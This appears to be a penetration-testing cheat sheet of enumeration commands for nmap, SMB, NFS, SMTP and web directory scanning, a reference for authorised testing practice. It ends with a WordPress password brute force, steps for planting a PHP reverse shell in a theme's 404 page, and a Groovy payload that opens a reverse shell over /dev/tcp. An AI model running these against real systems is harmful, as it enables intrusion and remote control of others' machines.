sudo nmap -sn <RANGE>
sudo netdiscover -r <RANGE>
sudo netdisover -i <INTERFACE>
21: ftp
22: ssh
23: telnet
25: smtp
53: domain name system
80: http
110: pop3
111: rpcbind
135: msrpc
139: netbios-ssn
143: imap
443: https
445: microsoft-ds
993: imaps
995: pop3s
1723: pptp
3306: mysql
3389: ms-wbt-server
5900: vnc
8080: http-proxy
nmap <TARGET> -sV -sC -O -p- -vv -oA fulltcp_<TARGET>
nmap <TARGET> -sU -sV -sC -p- -vv -oA fulludp_<TARGET>
nmap <TARGET> -p 20,21,22,25,80,443,111,135,139,443,8080 -oA portsweep_<TARGET>
nmap <TARGET> --top-ports 25 -oA portsweep_top25_<TARGET>
nmap <TARGET> -p- --script vuln -vv -oA vulnscan_<TARGET>
-PnNo ping #use if host says down but you know its up)-snNo port scan #use if you just want to scan a range to check if hosts are up.
If there is an open HTTP proxy, connect to it by configuring a proxy in your browser.
https://github.com/Tib3rius/AutoRecon
autorecon -vv <IP>
nc -nv <IP> 25
VRFY root
VRFY idontexist
Check output
https://book.hacktricks.xyz/pentesting/pentesting-smb
https://github.com/unkn-0wn/SmbVersion
sudo python3 smbver.py <IP> <PORT>
nmap -p 139,445 --script=smb-enum-shares.nse,smb-enum-users.nse <IP>
nmap -p 139,445 --script=/usr/share/nmap/scripts/smb* <IP>
Gotta try this: https://github.com/cddmp/enum4linux-ng
enum4linux <IP>
smbclient -L <IP>
smbclient -L <IP> -U '<USER>'%'<PASS>'
smbclient //<IP>/<SHARE>
get <FILE NAME>-
smbget -R smb://<IP>/<SHARE>
smbmap -H <IP> -p 445 -u ''
nbtscan <IP>
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <IP>
- Check the file extensions in URL’s to see what the application is running (.net .aspx .php etc)
- Inspect page content
- Check Firefox debugger for outdated javascript libraries
- Look for /robots.txt and /sitemap.xml
curl <WEBPAGE>
grep -o '[^/]*\.<DOMAIN>\.com' index.html | sort -u > subdomains.txt
Collect screenshot from list of ips
for ip in $(cat <IP FILE>); do cutycapt --url=$ip --out=$ip.png;done
Run the following bash script
#!/bin/bash
# Bash script to examine the scan results through HTML.
echo "<HTML><BODY><BR>" > web.html
ls -1 *.png | awk -F : '{ print $1":\n<BR><IMG SRC=\""$1""$2"\" width=600><BR>"}' >> w
eb.html
echo "</BODY></HTML>" >> web.html
nikto -host <URL> -output nikto-URL.txt
-Rto disable recursive scanning-pset up a proxy IP:PORT-XAppend each word with this extensions.
dirb <URL> /usr/share/dirb/wordlists/big.txt -o dirb-<URL>.txt
dirb <URL> /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -o dirb-<URL>.txt
- use the
-bflag to blacklist status codes. - Use the
-xflag to add file extensions.
gobuster dir -w /opt/SecLists/Discovery/Web-Content/big.txt -u <URL> gobuster-<URL>.txt
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u <URL> gobuster-<URL>.txt
wpscan -url <URL>
wpscan --url <URL> --usernames <USERNAME> --passwords /usr/share/wordlists/rockyou.txt --max-threads 50
- Login --> Appearance --> Theme editor --> 404.php
- gedit /usr/share/webshells/php/php-reverse-shell.php
- Paste in 404.php
- Start listener and go to an unexisting page in the browser
- After login go to /script
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
curl -v -X OPTIONS http://website/directory
#HTTP options such as PUT, Delete are bad